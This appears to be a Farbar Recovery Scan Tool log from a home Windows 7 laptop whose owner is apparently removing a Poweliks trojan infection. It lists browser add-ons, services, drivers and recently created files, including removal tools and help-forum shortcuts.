BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll [2011-04-13] (Symantec Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2015-02-06] (Oracle Corporation)
BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll [2011-04-13] (Symantec Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2015-02-06] (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)
Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

FireFox:
========
FF ProfilePath: C:\Users\Wayne\AppData\Roaming\Mozilla\Firefox\Profiles\lh4xbcbb.default [2016-10-21]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default ->
FF Homepage: Mozilla\Firefox\Profiles\lh4xbcbb.default -> hxxps://www.google.com/
FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client
FF Extension: (Symantec VIP Access Add-On) - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-23] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore
FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2015-12-29] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-15] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIIPT.dll [2014-07-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIUpdater.dll [2014-07-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2015-02-06] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default [2016-10-20]
CHR Extension: (Google Slides) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-29]
CHR Extension: (Google Docs) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-29]
CHR Extension: (Google Drive) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-28]
CHR Extension: (YouTube) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-18]
CHR Extension: (Google Search) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]
CHR Extension: (Google Sheets) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-29]
CHR Extension: (Google Docs Offline) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-28]
CHR Extension: (Skype) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-28]
CHR Extension: (Gmail) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]
CHR Extension: (Chrome Media Router) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-15]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 CAMService; C:\Program Files\Intel\CAM\bin\CAMService.exe [1243344 2014-09-03] (Intel® Corporation)
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)
S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\LENOVO\easyplussdk\bin\EPHotspot64.exe [619776 2015-01-15] (Lenovo)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-06] (Lenovo Group Limited)
S2 LPlatSvc; C:\Windows\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)
R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)
R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2015-12-29] (McAfee, Inc.)
R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208936 2015-08-20] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [254792 2015-12-29] (McAfee, Inc.)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-12-04] ()
R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2012-03-05] (Lenovo Group Limited)
R3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28544 2016-09-10] ()
R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-12-04] (Intel® Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S4 epp; C:\EEK\bin64\epp.sys [116944 2016-06-30] (Emsisoft Ltd)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [412440 2015-12-29] (McAfee, Inc.)
R3 mfeaacsk; C:\Windows\System32\drivers\mfeaacsk.sys [64416 2015-12-29] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [347800 2015-12-29] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496888 2015-12-29] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [875928 2015-12-29] (McAfee, Inc.)
R3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [66080 2015-12-29] (McAfee, Inc.)
S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [114880 2015-12-29] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344704 2015-12-29] (McAfee, Inc.)
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-23] ()
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-21 22:02 - 2016-10-21 22:03 - 00022015 _____ C:\Users\Wayne\Desktop\FRST.txt
2016-10-21 22:00 - 2016-10-21 22:00 - 00002288 _____ C:\Users\Wayne\Desktop\Quarantine_161021-215939.txt
2016-10-21 21:35 - 2016-10-21 21:35 - 00000240 _____ C:\Users\Wayne\Desktop\Script.reg
2016-10-21 21:29 - 2016-10-21 22:00 - 00000000 ____D C:\EEK
2016-10-21 21:27 - 2016-10-21 21:28 - 270832032 _____ C:\Users\Wayne\Desktop\EmsisoftEmergencyKit.exe
2016-10-20 23:48 - 2016-10-20 23:48 - 00000285 _____ C:\Users\Wayne\Desktop\KEEP firefox shortcut icons on my desktop all went blank Solved - Page 2 - Windows 7 Help Forums.URL
2016-10-20 23:35 - 2016-10-20 23:35 - 00000000 ____D C:\Users\Wayne\AppData\Local\Apps\2.0
2016-10-20 23:04 - 2016-10-21 21:25 - 00000000 ____D C:\Users\Wayne\Desktop\4th try
2016-10-20 22:01 - 2016-09-15 04:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-10-20 22:01 - 2016-09-13 05:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-10-20 22:01 - 2016-09-13 05:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-10-20 22:01 - 2016-09-09 08:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-10-20 22:01 - 2016-09-09 08:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-10-20 22:01 - 2016-08-22 06:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-10-20 21:52 - 2016-10-20 22:39 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-20 20:42 - 2016-10-20 20:43 - 00000000 ____D C:\Users\Wayne\Desktop\3rd try
2016-10-19 18:58 - 2016-10-19 18:59 - 00000000 ____D C:\Users\Wayne\Desktop\2nd try
2016-10-18 20:37 - 2016-10-20 20:52 - 00000000 ____D C:\Users\Wayne\AppData\Local\1282a1
2016-10-18 20:37 - 2016-10-18 20:37 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\403522
2016-10-18 19:55 - 2016-10-18 20:00 - 00000000 ____D C:\Users\Wayne\Desktop\1st try
2016-10-16 09:37 - 2016-10-16 09:37 - 00000310 _____ C:\Users\Wayne\Desktop\Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help - Virus, Trojan, Spyware, and Malware Remov.URL
2016-10-16 00:25 - 2016-10-16 00:25 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Wayne\Desktop\iExplore.exe
2016-10-15 23:50 - 2016-10-15 23:50 - 00224968 _____ (ESET) C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe
2016-10-15 23:47 - 2016-10-15 23:47 - 01577380 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).pdf
2016-10-15 23:41 - 2016-10-15 23:41 - 00000264 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).URL
2016-10-15 23:39 - 2016-10-15 23:39 - 00000287 _____ C:\Users\Wayne\Desktop\Infection by Trojan-PoweLike!bat via bogus Firefox update - Virus, Trojan, Spyware, and Malware Removal Logs.URL
2016-10-15 23:18 - 2016-10-21 22:02 - 00000000 ____D C:\FRST
2016-10-15 23:15 - 2016-10-18 20:25 - 02407424 _____ (Farbar) C:\Users\Wayne\Desktop\FRST64.exe
2016-10-15 23:13 - 2016-10-15 23:13 - 00000277 _____ C:\Users\Wayne\Desktop\FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials.URL
2016-10-15 21:41 - 2016-10-15 22:45 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-15 21:40 - 2016-10-15 21:40 - 00001117 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-10-15 21:40 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-10-15 21:40 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-10-15 21:40 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-10-15 18:33 - 2016-10-15 18:33 - 22851472 _____ (Malwarebytes ) C:\Users\Wayne\Desktop\mbam-setup-2.2.1.1043.exe
2016-10-15 17:05 - 2016-10-15 17:05 - 00000102 _____ C:\Users\Wayne\Desktop\Trojan-Powe!bat infecting my PC - Resolved Malware Removal Logs - Malwarebytes Forums.url
2016-10-15 17:00 - 2016-10-15 17:00 - 00000168 _____ C:\Users\Wayne\Desktop\virusscan on access trojan-powellike!nk keeps appearing - Google Search.url
2016-10-15 16:58 - 2016-10-15 16:58 - 00000084 _____ C:\Users\Wayne\Desktop\On-Access Scan Messages - Trojan-PoweLike!bat -McAfee Communities.url
2016-10-15 16:56 - 2016-10-15 16:56 - 00000173 _____ C:\Users\Wayne\Desktop\Threat Advisory- Trojan-Powelike.url
2016-10-15 15:57 - 2016-10-15 15:57 - 00000200 _____ C:\Users\Wayne\Desktop\deturl.com - download videos from YouTube..URL
2016-10-15 15:28 - 2016-09-30 10:13 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-10-15 15:28 - 2016-09-30 09:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-10-15 15:28 - 2016-09-30 05:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-15 15:28 - 2016-09-30 05:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-10-15 15:28 - 2016-09-30 05:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-10-15 15:28 - 2016-09-29 21:55 - 25765376 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-10-15 15:28 - 2016-09-29 20:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-10-15 15:28 - 2016-09-29 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-10-15 15:28 - 2016-09-29 20:26 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-10-15 15:28 - 2016-09-29 20:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-10-15 15:28 - 2016-09-29 20:18 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-10-15 15:28 - 2016-09-29 20:17 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-10-15 15:28 - 2016-09-29 20:14 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-10-15 15:28 - 2016-09-29 20:13 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-10-15 15:28 - 2016-09-29 20:13 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-10-15 15:28 - 2016-09-29 20:12 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-10-15 15:28 - 2016-09-29 20:12 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-10-15 15:28 - 2016-09-29 20:09 - 06048256 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-10-15 15:28 - 2016-09-29 20:05 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-10-15 15:28 - 2016-09-29 20:02 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-10-15 15:28 - 2016-09-29 19:55 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-10-15 15:28 - 2016-09-29 19:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-10-15 15:28 - 2016-09-29 19:54 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-10-15 15:28 - 2016-09-29 19:51 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-10-15 15:28 - 2016-09-29 19:50 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-10-15 15:28 - 2016-09-29 19:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-10-15 15:28 - 2016-09-29 19:47 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-10-15 15:28 - 2016-09-29 19:46 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-10-15 15:28 - 2016-09-29 19:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-10-15 15:28 - 2016-09-29 19:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-10-15 15:28 - 2016-09-29 19:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-10-15 15:28 - 2016-09-29 19:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-10-15 15:28 - 2016-09-29 19:35 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-10-15 15:28 - 2016-09-29 19:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-10-15 15:28 - 2016-09-29 19:33 - 00724992 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-10-15 15:28 - 2016-09-29 19:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-10-15 15:28 - 2016-09-29 19:31 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-10-15 15:28 - 2016-09-29 19:31 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-10-15 15:28 - 2016-09-29 19:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-10-15 15:28 - 2016-09-29 19:21 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-10-15 15:28 - 2016-09-29 19:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-10-15 15:28 - 2016-09-29 19:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-10-15 15:28 - 2016-09-29 19:17 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-10-15 15:28 - 2016-09-29 19:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-10-15 15:28 - 2016-09-29 19:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-10-15 15:28 - 2016-09-29 19:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-10-15 15:28 - 2016-09-29 19:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-10-15 15:28 - 2016-09-29 19:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-10-15 15:28 - 2016-09-29 19:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-10-15 15:28 - 2016-09-29 19:05 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-10-15 15:28 - 2016-09-29 19:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-10-15 15:28 - 2016-09-29 18:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-10-15 15:28 - 2016-09-29 18:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-10-15 15:28 - 2016-09-29 18:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-10-15 15:28 - 2016-09-29 18:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-10-15 15:28 - 2016-09-15 05:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-15 15:28 - 2016-09-15 05:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-15 15:28 - 2016-09-15 05:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-10-15 15:28 - 2016-09-15 05:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-10-15 15:28 - 2016-09-12 11:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-15 15:28 - 2016-09-12 11:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-15 15:28 - 2016-09-12 11:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
